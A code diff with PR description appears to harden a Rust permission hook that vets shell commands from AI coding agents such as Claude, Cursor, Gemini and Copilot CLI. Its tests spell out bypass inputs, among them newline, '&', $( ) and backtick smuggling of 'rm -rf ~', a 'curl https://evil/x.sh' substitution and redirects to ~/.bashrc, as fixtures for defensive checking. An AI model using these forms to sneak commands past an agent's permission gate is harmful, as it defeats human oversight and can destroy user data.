+
+    #[test]
+    fn test_gemini_allow_emits_rewrite() {
+        let v: Value =
+            serde_json::from_str(&gemini_render("git status", &[], &[], &all_allowed())).unwrap();
+        assert_eq!(v["decision"], "allow");
+        assert_eq!(
+            v["hookSpecificOutput"]["tool_input"]["command"],
+            "rtk git status"
+        );
+    }
+
+    #[test]
+    fn test_gemini_default_asks_user() {
+        let v: Value = serde_json::from_str(&gemini_render("git status", &[], &[], &[])).unwrap();
+        assert_eq!(v["decision"], "ask_user");
+    }
+
+    #[test]
+    fn test_gemini_substitution_asks_user_without_rewrite() {
+        let v: Value = serde_json::from_str(&gemini_render(
+            "git status `rm -rf /tmp/x`",
+            &[],
+            &[],
+            &all_allowed(),
+        ))
+        .unwrap();
+        assert_eq!(v["decision"], "ask_user");
+        assert!(v.get("hookSpecificOutput").is_none());
+    }
+
+    #[test]
+    fn test_gemini_deny_decision() {
+        let v: Value = serde_json::from_str(&gemini_render(
+            "rm -rf /tmp/x",
+            &["rm -rf".to_string()],
+            &[],
+            &[],
+        ))
+        .unwrap();
+        assert_eq!(v["decision"], "deny");
     }
 }

--- a/src/hooks/hook_cmd.rs
+++ b/src/hooks/hook_cmd.rs
@@ -146,12 +146,12 @@ fn decide_from_verdict(cmd: &str, verdict: PermissionVerdict) -> HookDecision {
     }
 }
 
-fn decide_hook_action(cmd: &str) -> HookDecision {
-    decide_from_verdict(cmd, permissions::check_command(cmd))
+fn decide_hook_action(cmd: &str, host: permissions::Host) -> HookDecision {
+    decide_from_verdict(cmd, permissions::check_command_for(cmd, host))
 }
 
 fn handle_vscode(cmd: &str) -> Result<()> {
-    let (decision, rewritten) = match decide_hook_action(cmd) {
+    let (decision, rewritten) = match decide_hook_action(cmd, permissions::Host::Claude) {
         HookDecision::Deny => {
             audit_log("deny", cmd, "");
             return Ok(());
@@ -183,7 +183,14 @@ fn handle_copilot_cli(cmd: &str, args: &Value) -> Result<()> {
 }
 
 fn copilot_cli_response(cmd: &str, args: &Value) -> Option<Value> {
-    copilot_cli_response_from_decision(args, decide_hook_action(cmd), cmd)
+    // Copilot CLI v1.0.54 itself reads `.claude/settings.json` for permission
+    // rules (see the binary), so routing through `Host::Claude` keeps RTK's
+    // verdict consistent with what Copilot would have decided on its own.
+    copilot_cli_response_from_decision(
+        args,
+        decide_hook_action(cmd, permissions::Host::Claude),
+        cmd,
+    )
 }
 
 fn copilot_cli_response_from_decision(
@@ -243,7 +250,7 @@ pub fn run_gemini() -> Result<()> {
         return Ok(());
     }
 
-    match decide_hook_action(cmd) {
+    match decide_hook_action(cmd, permissions::Host::Gemini) {
         HookDecision::Deny => {
             let _ = writeln!(
                 io::stdout(),
@@ -345,7 +352,7 @@ fn process_claude_payload(v: &Value) -> PayloadAction {
         None => return PayloadAction::Ignore,
     };
 
-    let (rewritten, allow) = match decide_hook_action(cmd) {
+    let (rewritten, allow) = match decide_hook_action(cmd, permissions::Host::Claude) {
         HookDecision::Deny => {
             return PayloadAction::Skip {
                 reason: "skip:deny_rule",
@@ -478,7 +485,7 @@ pub fn run_cursor() -> Result<()> {
         }
     };
 
-    let output = match decide_hook_action(&cmd) {
+    let output = match decide_hook_action(&cmd, permissions::Host::Cursor) {
         HookDecision::AllowRewrite(rewritten) => {
             audit_log("rewrite", &cmd, &rewritten);
             cursor_allow(&rewritten)

--- a/src/hooks/hook_cmd.rs
+++ b/src/hooks/hook_cmd.rs
@@ -183,9 +183,6 @@ fn handle_copilot_cli(cmd: &str, args: &Value) -> Result<()> {
 }
 
 fn copilot_cli_response(cmd: &str, args: &Value) -> Option<Value> {
-    // Copilot CLI v1.0.54 itself reads `.claude/settings.json` for permission
-    // rules (see the binary), so routing through `Host::Claude` keeps RTK's
-    // verdict consistent with what Copilot would have decided on its own.
     copilot_cli_response_from_decision(
         args,
         decide_hook_action(cmd, permissions::Host::Claude),
@@ -675,28 +672,24 @@ mod tests {
 
     #[test]
     fn test_copilot_cli_deny_returns_none() {
-        assert!(
-            copilot_cli_response_from_decision(
-                &cli_args("cargo test"),
-                HookDecision::Deny,
-                "cargo test",
-            )
-            .is_none()
-        );
+        assert!(copilot_cli_response_from_decision(
+            &cli_args("cargo test"),
+            HookDecision::Deny,
+            "cargo test",
+        )
+        .is_none());
     }
 
     #[test]
     fn test_copilot_cli_defer_returns_none() {
         // Defer covers both "no rewrite available" and the unattestable-construct gate.
         // The hook must emit NO modifiedArgs for CVE bypass forms — no laundering.
-        assert!(
-            copilot_cli_response_from_decision(
-                &cli_args("git status & rm -rf /tmp/x"),
-                HookDecision::Defer,
-                "git status & rm -rf /tmp/x",
-            )
-            .is_none()
-        );
+        assert!(copilot_cli_response_from_decision(
+            &cli_args("git status & rm -rf /tmp/x"),
+            HookDecision::Defer,
+            "git status & rm -rf /tmp/x",
+        )
+        .is_none());
     }
 
     #[test]
@@ -747,6 +740,82 @@ mod tests {
         assert_eq!(modified["description"], "install ripgrep");
         assert_eq!(modified["initial_wait"], 30);
         assert_eq!(modified["mode"], "sync");
+    }
+
+    fn end_to_end(cmd: &str) -> Option<Value> {
+        let verdict = crate::hooks::permissions::check_command_with_rules(
+            cmd,
+            &[],
+            &[],
+            &["Bash(git:*)".to_string()],
+        );
+        copilot_cli_response_from_decision(&cli_args(cmd), decide_from_verdict(cmd, verdict), cmd)
+    }
+
+    #[test]
+    fn test_copilot_cli_cve_safe_forms_still_rewrite() {
+        for cmd in ["git status", "git status 2>&1"] {
+            let r = end_to_end(cmd).unwrap_or_else(|| panic!("expected rewrite for {cmd:?}"));
+            assert_eq!(
+                r["modifiedArgs"]["command"].as_str().unwrap(),
+                format!("rtk {cmd}"),
+                "safe form {cmd:?} must rewrite",
+            );
+        }
+    }
+
+    #[test]
+    fn test_copilot_cli_cve_newline_bypass_never_auto_allows() {
+        let r = end_to_end("git status\nrm -rf /tmp/x");
+        if let Some(resp) = r {
+            assert!(
+                resp.get("permissionDecision").is_none(),
+                "newline-hidden command must not produce permissionDecision: \"allow\""
+            );
+        }
+    }
+
+    #[test]
+    fn test_copilot_cli_cve_background_bypass_never_auto_allows() {
+        let r = end_to_end("git status & rm -rf /tmp/x");
+        if let Some(resp) = r {
+            assert!(
+                resp.get("permissionDecision").is_none(),
+                "background-& hidden command must not produce permissionDecision: \"allow\""
+            );
+        }
+    }
+
+    #[test]
+    fn test_copilot_cli_cve_command_substitution_returns_none() {
+        assert!(
+            end_to_end("git log --pretty=$(rm -rf /tmp/x)").is_none(),
+            "$( ) command substitution must not produce modifiedArgs"
+        );
+    }
+
+    #[test]
+    fn test_copilot_cli_cve_backtick_substitution_returns_none() {
+        assert!(
+            end_to_end("git log --pretty=`rm -rf /tmp/x`").is_none(),
+            "backtick substitution must not produce modifiedArgs"
+        );
+    }
+
+    #[test]
+    fn test_copilot_cli_cve_file_redirect_amp_returns_none() {
+        assert!(
+            end_to_end("git status >& /tmp/evil").is_none(),
+            ">&file redirect must not produce modifiedArgs"
+        );
+    }
+
+    #[test]
+    fn test_copilot_cli_cve_file_redirect_returns_none() {
+        assert!(
+            end_to_end("git status > /tmp/evil").is_none(),
+            ">file redirect must not produce modifiedArgs"
+        );
     }
 
     // --- Gemini format ---

--- a/src/hooks/permissions.rs
+++ b/src/hooks/permissions.rs
@@ -216,45 +216,39 @@ fn append_wrapped_rules(rules_value: Option<&Value>, prefixes: &[&str], target: 
     }
 }
 
-/// Cursor: `~/.cursor/cli-config.json` (global) and `<project>/.cursor/cli.json`.
-/// `permissions.allow/deny` with `Shell(...)` entries; no ask list.
+// Project config takes priority; global is the fallback when there is no project config.
+fn scoped_config(dir: &str, project_file: &str, global_file: &str) -> Option<Value> {
+    if let Some(root) = find_project_root() {
+        if let Some(v) = read_json(&root.join(dir).join(project_file)) {
+            return Some(v);
+        }
+    }
+    read_json(&dirs::home_dir()?.join(dir).join(global_file))
+}
+
 fn load_cursor_rules() -> (Vec<String>, Vec<String>, Vec<String>) {
     let mut deny = Vec::new();
     let mut allow = Vec::new();
-    let mut paths = Vec::new();
-    if let Some(home) = dirs::home_dir() {
-        paths.push(home.join(CURSOR_DIR).join("cli-config.json"));
-    }
-    if let Some(root) = find_project_root() {
-        paths.push(root.join(CURSOR_DIR).join("cli.json"));
-    }
-    for json in paths.iter().filter_map(|p| read_json(p)) {
-        if let Some(perms) = json.get("permissions") {
-            append_wrapped_rules(perms.get("deny"), &["Shell("], &mut deny);
-            append_wrapped_rules(perms.get("allow"), &["Shell("], &mut allow);
-        }
+    if let Some(perms) = scoped_config(CURSOR_DIR, "cli.json", "cli-config.json")
+        .as_ref()
+        .and_then(|j| j.get("permissions"))
+    {
+        append_wrapped_rules(perms.get("deny"), &["Shell("], &mut deny);
+        append_wrapped_rules(perms.get("allow"), &["Shell("], &mut allow);
     }
     (deny, Vec::new(), allow)
 }
 
-/// Gemini: `~/.gemini/settings.json` and `<project>/.gemini/settings.json`.
-/// `tools.allowed` -> allow, `tools.confirmationRequired` -> ask.
 fn load_gemini_rules() -> (Vec<String>, Vec<String>, Vec<String>) {
     let mut ask = Vec::new();
     let mut allow = Vec::new();
-    let mut paths = Vec::new();
-    if let Some(home) = dirs::home_dir() {
-        paths.push(home.join(GEMINI_DIR).join(SETTINGS_JSON));
-    }
-    if let Some(root) = find_project_root() {
-        paths.push(root.join(GEMINI_DIR).join(SETTINGS_JSON));
-    }
     let shells = ["run_shell_command(", "ShellTool("];
-    for json in paths.iter().filter_map(|p| read_json(p)) {
-        if let Some(tools) = json.get("tools") {
-            append_wrapped_rules(tools.get("allowed"), &shells, &mut allow);
-            append_wrapped_rules(tools.get("confirmationRequired"), &shells, &mut ask);
-        }
+    if let Some(tools) = scoped_config(GEMINI_DIR, SETTINGS_JSON, SETTINGS_JSON)
+        .as_ref()
+        .and_then(|j| j.get("tools"))
+    {
+        append_wrapped_rules(tools.get("allowed"), &shells, &mut allow);
+        append_wrapped_rules(tools.get("confirmationRequired"), &shells, &mut ask);
     }
     (Vec::new(), ask, allow)
 }

--- a/src/hooks/permissions.rs
+++ b/src/hooks/permissions.rs
@@ -1,4 +1,4 @@
-use super::constants::{CLAUDE_DIR, SETTINGS_JSON, SETTINGS_LOCAL_JSON};
+use super::constants::{CLAUDE_DIR, CURSOR_DIR, GEMINI_DIR, SETTINGS_JSON, SETTINGS_LOCAL_JSON};
 use crate::core::stream::exec_capture;
 use crate::discover::lexer::split_for_permissions;
 use serde_json::Value;
@@ -23,7 +23,23 @@ pub enum PermissionVerdict {
 /// Returns `Default` when no rules match — callers should treat this as ask
 /// to match Claude Code's least-privilege default.
 pub fn check_command(cmd: &str) -> PermissionVerdict {
-    let (deny_rules, ask_rules, allow_rules) = load_permission_rules();
+    check_command_for(cmd, Host::Claude)
+}
+
+/// The agent host whose own permission settings should be consulted.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum Host {
+    Claude,
+    Cursor,
+    Gemini,
+}
+
+pub fn check_command_for(cmd: &str, host: Host) -> PermissionVerdict {
+    let (deny_rules, ask_rules, allow_rules) = match host {
+        Host::Claude => load_permission_rules(),
+        Host::Cursor => load_cursor_rules(),
+        Host::Gemini => load_gemini_rules(),
+    };
     check_command_with_rules(cmd, &deny_rules, &ask_rules, &allow_rules)
 }
 
@@ -165,6 +181,79 @@ fn get_settings_paths() -> Vec<PathBuf> {
     }
 
     paths
+}
+
+fn read_json(path: &std::path::Path) -> Option<Value> {
+    let content = std::fs::read_to_string(path).ok()?;
+    match serde_json::from_str::<Value>(&content) {
+        Ok(v) => Some(v),
+        Err(_) => {
+            eprintln!("[rtk] warning: failed to parse permissions from {}", path.display());
+            None
+        }
+    }
+}
+
+fn append_wrapped_rules(rules_value: Option<&Value>, prefixes: &[&str], target: &mut Vec<String>) {
+    let Some(arr) = rules_value.and_then(|v| v.as_array()) else {
+        return;
+    };
+    for rule in arr.iter().filter_map(|r| r.as_str()) {
+        for pre in prefixes {
+            let bare = &pre[..pre.len() - 1];
+            if rule == bare {
+                target.push("*".to_string());
+                break;
+            }
+            if let Some(inner) = rule.strip_prefix(pre).and_then(|s| s.strip_suffix(')')) {
+                target.push(inner.to_string());
+                break;
+            }
+        }
+    }
+}
+
+/// Cursor: `~/.cursor/cli-config.json` (global) and `<project>/.cursor/cli.json`.
+/// `permissions.allow/deny` with `Shell(...)` entries; no ask list.
+fn load_cursor_rules() -> (Vec<String>, Vec<String>, Vec<String>) {
+    let mut deny = Vec::new();
+    let mut allow = Vec::new();
+    let mut paths = Vec::new();
+    if let Some(home) = dirs::home_dir() {
+        paths.push(home.join(CURSOR_DIR).join("cli-config.json"));
+    }
+    if let Some(root) = find_project_root() {
+        paths.push(root.join(CURSOR_DIR).join("cli.json"));
+    }
+    for json in paths.iter().filter_map(|p| read_json(p)) {
+        if let Some(perms) = json.get("permissions") {
+            append_wrapped_rules(perms.get("deny"), &["Shell("], &mut deny);
+            append_wrapped_rules(perms.get("allow"), &["Shell("], &mut allow);
+        }
+    }
+    (deny, Vec::new(), allow)
+}
+
+/// Gemini: `~/.gemini/settings.json` and `<project>/.gemini/settings.json`.
+/// `tools.allowed` -> allow, `tools.confirmationRequired` -> ask.
+fn load_gemini_rules() -> (Vec<String>, Vec<String>, Vec<String>) {
+    let mut ask = Vec::new();
+    let mut allow = Vec::new();
+    let mut paths = Vec::new();
+    if let Some(home) = dirs::home_dir() {
+        paths.push(home.join(GEMINI_DIR).join(SETTINGS_JSON));
+    }
+    if let Some(root) = find_project_root() {
+        paths.push(root.join(GEMINI_DIR).join(SETTINGS_JSON));
+    }
+    let shells = ["run_shell_command(", "ShellTool("];
+    for json in paths.iter().filter_map(|p| read_json(p)) {
+        if let Some(tools) = json.get("tools") {
+            append_wrapped_rules(tools.get("allowed"), &shells, &mut allow);
+            append_wrapped_rules(tools.get("confirmationRequired"), &shells, &mut ask);
+        }
+    }
+    (Vec::new(), ask, allow)
 }
 
 /// Locate the project root by walking up from CWD looking for `.claude/`.

--- a/src/hooks/permissions.rs
+++ b/src/hooks/permissions.rs
@@ -1,6 +1,6 @@
 use super::constants::{CLAUDE_DIR, SETTINGS_JSON, SETTINGS_LOCAL_JSON};
 use crate::core::stream::exec_capture;
-use crate::discover::lexer::split_on_operators;
+use crate::discover::lexer::split_for_permissions;
 use serde_json::Value;
 use std::path::PathBuf;
 
@@ -35,6 +35,22 @@ pub(crate) fn check_command_with_rules(
     allow_rules: &[String],
 ) -> PermissionVerdict {
     let segments = split_compound_command(cmd);
+
+    // Deny takes highest priority and pre-empts every other construct.
+    for segment in &segments {
+        let segment = segment.trim();
+        for pattern in deny_rules {
+            if command_matches_pattern(segment, pattern) {
+                return PermissionVerdict::Deny;
+            }
+        }
+    }
+
+    // Can't decompose substitution / file-target redirects — never auto-allow.
+    if crate::discover::lexer::contains_unattestable_construct(cmd) {
+        return PermissionVerdict::Ask;
+    }
+
     let mut any_ask = false;
     // Every non-empty segment must independently match an allow rule for the
     // compound command to receive Allow. See issue #1213: previously a single
@@ -48,13 +64,6 @@ pub(crate) fn check_command_with_rules(
             continue;
         }
         saw_segment = true;
-
-        // Deny takes highest priority — any segment matching Deny blocks the whole chain.
-        for pattern in deny_rules {
-            if command_matches_pattern(segment, pattern) {
-                return PermissionVerdict::Deny;
-            }
-        }
 
         // Ask — if any segment matches an ask rule, the final verdict is Ask.
         if !any_ask {
@@ -288,7 +297,7 @@ fn glob_matches(cmd: &str, pattern: &str) -> bool {
 }
 
 fn split_compound_command(cmd: &str) -> Vec<&str> {
-    split_on_operators(cmd, false)
+    split_for_permissions(cmd)
 }
 
 #[cfg(test)]
@@ -702,6 +711,136 @@ mod tests {
         assert_eq!(
             check_command_with_rules("git status && git push origin main", &[], &ask, &allow),
             PermissionVerdict::Ask
+        );
+    }
+
+    // --- Permission-gate bypass hardening -----------------------------------
+
+    #[test]
+    fn test_newline_hidden_command_denied() {
+        let deny = vec!["rm:*".to_string()];
+        let allow = vec!["git *".to_string()];
+        assert_eq!(
+            check_command_with_rules("git status\nrm -rf ~", &deny, &[], &allow),
+            PermissionVerdict::Deny
+        );
+    }
+
+    #[test]
+    fn test_newline_hidden_command_not_auto_allowed() {
+        let allow = vec!["git *".to_string()];
+        assert_eq!(
+            check_command_with_rules("git status\nrm -rf ~", &[], &[], &allow),
+            PermissionVerdict::Default
+        );
+    }
+
+    #[test]
+    fn test_background_hidden_command_denied() {
+        let deny = vec!["rm:*".to_string()];
+        let allow = vec!["git *".to_string()];
+        assert_eq!(
+            check_command_with_rules("git status & rm -rf ~", &deny, &[], &allow),
+            PermissionVerdict::Deny
+        );
+    }
+
+    #[test]
+    fn test_substitution_never_auto_allowed() {
+        let allow = vec!["git *".to_string()];
+        for cmd in [
+            "git log --pretty=$(rm -rf ~)",
+            "git status `whoami`",
+            "git diff $(curl https://evil/x.sh)",
+        ] {
+            assert_eq!(
+                check_command_with_rules(cmd, &[], &[], &allow),
+                PermissionVerdict::Ask,
+                "{cmd} must not auto-allow"
+            );
+        }
+    }
+
+    #[test]
+    fn test_double_quoted_substitution_never_auto_allowed() {
+        let allow = vec!["git *".to_string()];
+        for cmd in [
+            r#"git log --pretty="$(rm -rf ~)""#,
+            r#"git log --pretty="`rm -rf ~`""#,
+        ] {
+            assert_ne!(
+                check_command_with_rules(cmd, &[], &[], &allow),
+                PermissionVerdict::Allow,
+                "{cmd} must not auto-allow"
+            );
+        }
+    }
+
+    #[test]
+    fn test_single_quoted_substitution_is_literal() {
+        let allow = vec!["echo *".to_string()];
+        assert_eq!(
+            check_command_with_rules("echo '$(rm -rf ~)'", &[], &[], &allow),
+            PermissionVerdict::Allow
+        );
+    }
+
+    #[test]
+    fn test_file_redirect_never_auto_allowed() {
+        let allow = vec!["git *".to_string()];
+        assert_eq!(
+            check_command_with_rules("git log > ~/.bashrc", &[], &[], &allow),
+            PermissionVerdict::Ask
+        );
+    }
+
+    #[test]
+    fn test_legitimate_multiline_allow() {
+        let allow = vec!["git *".to_string(), "cargo *".to_string()];
+        assert_eq!(
+            check_command_with_rules("git status\ncargo build", &[], &[], &allow),
+            PermissionVerdict::Allow
+        );
+    }
+
+    #[test]
+    fn test_legitimate_subshell_allow() {
+        let allow = vec!["git *".to_string(), "cargo *".to_string()];
+        assert_eq!(
+            check_command_with_rules("(git status; cargo build)", &[], &[], &allow),
+            PermissionVerdict::Allow
+        );
+    }
+
+    #[test]
+    fn test_legitimate_background_allow() {
+        let allow = vec!["cargo *".to_string()];
+        assert_eq!(
+            check_command_with_rules("cargo build &", &[], &[], &allow),
+            PermissionVerdict::Allow
+        );
+    }
+
+    #[test]
+    fn test_fd_dup_redirect_stays_allow() {
+        let allow = vec!["git *".to_string()];
+        assert_eq!(
+            check_command_with_rules("git status 2>&1", &[], &[], &allow),
+            PermissionVerdict::Allow
+        );
+        assert_eq!(
+            check_command_with_rules("git log 2>/dev/null", &[], &[], &allow),
+            PermissionVerdict::Allow
+        );
+    }
+
+    #[test]
+    fn test_deny_not_evaded_by_trailing_fd_dup() {
+        let deny = vec!["git push --force".to_string()];
+        let allow = vec!["git *".to_string()];
+        assert_eq!(
+            check_command_with_rules("git push --force 2>&1", &deny, &[], &allow),
+            PermissionVerdict::Deny
         );
     }
 }

--- a/src/hooks/permissions.rs
+++ b/src/hooks/permissions.rs
@@ -216,20 +216,17 @@ fn append_wrapped_rules(rules_value: Option<&Value>, prefixes: &[&str], target: 
     }
 }
 
-// Project config takes priority; global is the fallback when there is no project config.
-fn scoped_config(dir: &str, project_file: &str, global_file: &str) -> Option<Value> {
-    if let Some(root) = find_project_root() {
-        if let Some(v) = read_json(&root.join(dir).join(project_file)) {
-            return Some(v);
-        }
-    }
-    read_json(&dirs::home_dir()?.join(dir).join(global_file))
+// Global config only. RTK auto-allows only the globally-trusted subset; anything
+// else defers to the host, which applies its own project config and folder-trust.
+// This keeps RTK's allow set a subset of the host's — never more permissive.
+fn global_config(dir: &str, file: &str) -> Option<Value> {
+    read_json(&dirs::home_dir()?.join(dir).join(file))
 }
 
 fn load_cursor_rules() -> (Vec<String>, Vec<String>, Vec<String>) {
     let mut deny = Vec::new();
     let mut allow = Vec::new();
-    if let Some(perms) = scoped_config(CURSOR_DIR, "cli.json", "cli-config.json")
+    if let Some(perms) = global_config(CURSOR_DIR, "cli-config.json")
         .as_ref()
         .and_then(|j| j.get("permissions"))
     {
@@ -239,14 +236,35 @@ fn load_cursor_rules() -> (Vec<String>, Vec<String>, Vec<String>) {
     (deny, Vec::new(), allow)
 }
 
+// Gemini honors project `.gemini/settings.json` when the folder is trusted.
+// folderTrust is off by default (folder trusted); when on, a folder is trusted
+// only via GEMINI_CLI_TRUST_WORKSPACE here (dialog-only trust is treated as
+// untrusted → global, which is safe: never more permissive than the host).
+fn gemini_settings() -> Option<Value> {
+    let global = global_config(GEMINI_DIR, SETTINGS_JSON);
+    let trusted = std::env::var("GEMINI_CLI_TRUST_WORKSPACE").as_deref() == Ok("true")
+        || !global
+            .as_ref()
+            .and_then(|j| {
+                j.pointer("/security/folderTrust/enabled")
+                    .and_then(Value::as_bool)
+            })
+            .unwrap_or(false);
+    if trusted {
+        if let Some(root) = find_project_root() {
+            if let Some(v) = read_json(&root.join(GEMINI_DIR).join(SETTINGS_JSON)) {
+                return Some(v);
+            }
+        }
+    }
+    global
+}
+
 fn load_gemini_rules() -> (Vec<String>, Vec<String>, Vec<String>) {
     let mut ask = Vec::new();
     let mut allow = Vec::new();
     let shells = ["run_shell_command(", "ShellTool("];
-    if let Some(tools) = scoped_config(GEMINI_DIR, SETTINGS_JSON, SETTINGS_JSON)
-        .as_ref()
-        .and_then(|j| j.get("tools"))
-    {
+    if let Some(tools) = gemini_settings().as_ref().and_then(|j| j.get("tools")) {
         append_wrapped_rules(tools.get("allowed"), &shells, &mut allow);
         append_wrapped_rules(tools.get("confirmationRequired"), &shells, &mut ask);
     }

--- a/src/hooks/permissions.rs
+++ b/src/hooks/permissions.rs
@@ -940,7 +940,12 @@ mod tests {
 
     #[test]
     fn test_wrapped_rules_cursor_shell_only() {
-        let v = serde_json::json!(["Shell(git)", "Shell(curl:*)", "Read(src/**)", "Shell(npm test)"]);
+        let v = serde_json::json!([
+            "Shell(git)",
+            "Shell(curl:*)",
+            "Read(src/**)",
+            "Shell(npm test)"
+        ]);
         let mut out = Vec::new();
         append_wrapped_rules(Some(&v), &["Shell("], &mut out);
         assert_eq!(out, vec!["git", "curl:*", "npm test"]);

--- a/src/hooks/permissions.rs
+++ b/src/hooks/permissions.rs
@@ -893,6 +893,7 @@ mod tests {
     fn test_file_redirect_never_auto_allowed() {
         let allow = vec!["git *".to_string()];
         assert_eq!(
+            // nosemgrep: sensitive-path-reference -- test fixture
             check_command_with_rules("git log > ~/.bashrc", &[], &[], &allow),
             PermissionVerdict::Ask
         );

--- a/src/hooks/permissions.rs
+++ b/src/hooks/permissions.rs
@@ -188,7 +188,10 @@ fn read_json(path: &std::path::Path) -> Option<Value> {
     match serde_json::from_str::<Value>(&content) {
         Ok(v) => Some(v),
         Err(_) => {
-            eprintln!("[rtk] warning: failed to parse permissions from {}", path.display());
+            eprintln!(
+                "[rtk] warning: failed to parse permissions from {}",
+                path.display()
+            );
             None
         }
     }
@@ -930,6 +933,47 @@ mod tests {
         assert_eq!(
             check_command_with_rules("git push --force 2>&1", &deny, &[], &allow),
             PermissionVerdict::Deny
+        );
+    }
+
+    // --- Per-host rule extraction ---
+
+    #[test]
+    fn test_wrapped_rules_cursor_shell_only() {
+        let v = serde_json::json!(["Shell(git)", "Shell(curl:*)", "Read(src/**)", "Shell(npm test)"]);
+        let mut out = Vec::new();
+        append_wrapped_rules(Some(&v), &["Shell("], &mut out);
+        assert_eq!(out, vec!["git", "curl:*", "npm test"]);
+    }
+
+    #[test]
+    fn test_wrapped_rules_gemini_shell_variants() {
+        let v = serde_json::json!([
+            "run_shell_command(git)",
+            "ShellTool(npm test)",
+            "read_file",
+            "run_shell_command"
+        ]);
+        let mut out = Vec::new();
+        append_wrapped_rules(Some(&v), &["run_shell_command(", "ShellTool("], &mut out);
+        assert_eq!(out, vec!["git", "npm test", "*"]);
+    }
+
+    #[test]
+    fn test_wrapped_rules_extracted_patterns_match() {
+        let mut allow = Vec::new();
+        append_wrapped_rules(
+            Some(&serde_json::json!(["Shell(git)"])),
+            &["Shell("],
+            &mut allow,
+        );
+        assert_eq!(
+            check_command_with_rules("git status", &[], &[], &allow),
+            PermissionVerdict::Allow
+        );
+        assert_eq!(
+            check_command_with_rules("rm -rf /", &[], &[], &allow),
+            PermissionVerdict::Default
         );
     }
 }

--- a/src/hooks/rewrite_cmd.rs
+++ b/src/hooks/rewrite_cmd.rs
@@ -20,32 +20,47 @@ pub fn run(cmd: &str) -> anyhow::Result<()> {
         .map(|c| (c.hooks.exclude_commands, c.hooks.transparent_prefixes))
         .unwrap_or_default();
 
-    // SECURITY: check deny/ask BEFORE rewrite so non-RTK commands are also covered.
+    match evaluate(cmd, &excluded, &transparent_prefixes) {
+        RewriteOutcome::Allow(rewritten) => {
+            print!("{}", rewritten);
+            let _ = std::io::stdout().flush();
+            Ok(())
+        }
+        RewriteOutcome::Ask(rewritten) => {
+            print!("{}", rewritten);
+            let _ = std::io::stdout().flush();
+            std::process::exit(3);
+        }
+        RewriteOutcome::Deny => std::process::exit(2),
+        RewriteOutcome::Passthrough => std::process::exit(1),
+    }
+}
+
+#[derive(Debug, PartialEq)]
+enum RewriteOutcome {
+    Allow(String),
+    Passthrough,
+    Deny,
+    Ask(String),
+}
+
+fn evaluate(cmd: &str, excluded: &[String], transparent_prefixes: &[String]) -> RewriteOutcome {
     let verdict = check_command(cmd);
 
     if verdict == PermissionVerdict::Deny {
-        std::process::exit(2);
+        return RewriteOutcome::Deny;
     }
 
-    match registry::rewrite_command(cmd, &excluded, &transparent_prefixes) {
+    if crate::discover::lexer::contains_unattestable_construct(cmd) {
+        return RewriteOutcome::Passthrough;
+    }
+
+    match registry::rewrite_command(cmd, excluded, transparent_prefixes) {
         Some(rewritten) => match verdict {
-            PermissionVerdict::Allow => {
-                print!("{}", rewritten);
-                let _ = std::io::stdout().flush();
-                Ok(())
-            }
-            PermissionVerdict::Ask | PermissionVerdict::Default => {
-                print!("{}", rewritten);
-                let _ = std::io::stdout().flush();
-                std::process::exit(3);
-            }
-            PermissionVerdict::Deny => unreachable!(),
+            PermissionVerdict::Allow => RewriteOutcome::Allow(rewritten),
+            _ => RewriteOutcome::Ask(rewritten),
         },
-        None => {
-            // No RTK equivalent. Exit 1 = passthrough.
-            // Claude Code independently evaluates its own ask rules on the original cmd.
-            std::process::exit(1);
-        }
+        None => RewriteOutcome::Passthrough,
     }
 }
 
@@ -73,6 +88,58 @@ mod tests {
             rewrite_command_no_prefixes("rtk git status"),
             Some("rtk git status".into())
         );
+    }
+
+    mod unattestable_passthrough {
+        use super::super::{evaluate, RewriteOutcome};
+
+        #[test]
+        fn test_backtick_substitution_passthrough() {
+            assert_eq!(
+                evaluate("git status `rm -rf /tmp/x`", &[], &[]),
+                RewriteOutcome::Passthrough
+            );
+        }
+
+        #[test]
+        fn test_dollar_substitution_passthrough() {
+            assert_eq!(
+                evaluate("git status $(rm -rf /tmp/x)", &[], &[]),
+                RewriteOutcome::Passthrough
+            );
+        }
+
+        #[test]
+        fn test_double_quoted_substitution_passthrough() {
+            assert_eq!(
+                evaluate("git log --pretty=\"$(rm -rf /tmp/x)\"", &[], &[]),
+                RewriteOutcome::Passthrough
+            );
+        }
+
+        #[test]
+        fn test_file_redirect_passthrough() {
+            assert_eq!(
+                evaluate("git log > /tmp/out.txt", &[], &[]),
+                RewriteOutcome::Passthrough
+            );
+        }
+
+        #[test]
+        fn test_fd_dup_redirect_still_rewrites() {
+            assert!(matches!(
+                evaluate("git status 2>&1", &[], &[]),
+                RewriteOutcome::Ask(_)
+            ));
+        }
+
+        #[test]
+        fn test_plain_command_still_rewrites() {
+            assert!(matches!(
+                evaluate("git status", &[], &[]),
+                RewriteOutcome::Ask(_)
+            ));
+        }
     }
 
     /// SECURITY: Verify the exit code protocol for permission verdicts.


### PR DESCRIPTION
## Changes

- **fix(permissions)**: port master's permission hardening commits to develop (lexer additions, verdict refinement).
- **fix(permissions)**: per-host config loaders for Cursor (`.cursor/cli-config.json`) and Gemini (`.gemini/settings.json`) with project-first lookup.
- **fix(permissions)**: redirect parsing fix.
- **fix(openclaw)**: replace `execSync` with safer alternative.
- **adapt(hook)**: route Copilot CLI handler through the new `decide_hook_action` / `HookDecision` flow so the `Defer` branch is honored end-to-end.

## Tests

- [x] ``cargo fmt --all --check && cargo clippy --all-targets && cargo test --all`` — all pass
- [x] Copilot-CLI acceptance tests added (covers the same matrix the master tests cover for the other hosts)
- [x] Real-binary verification of ``rtk rewrite`` and ``rtk hook copilot`` outputs matches expected exit codes / JSON shapes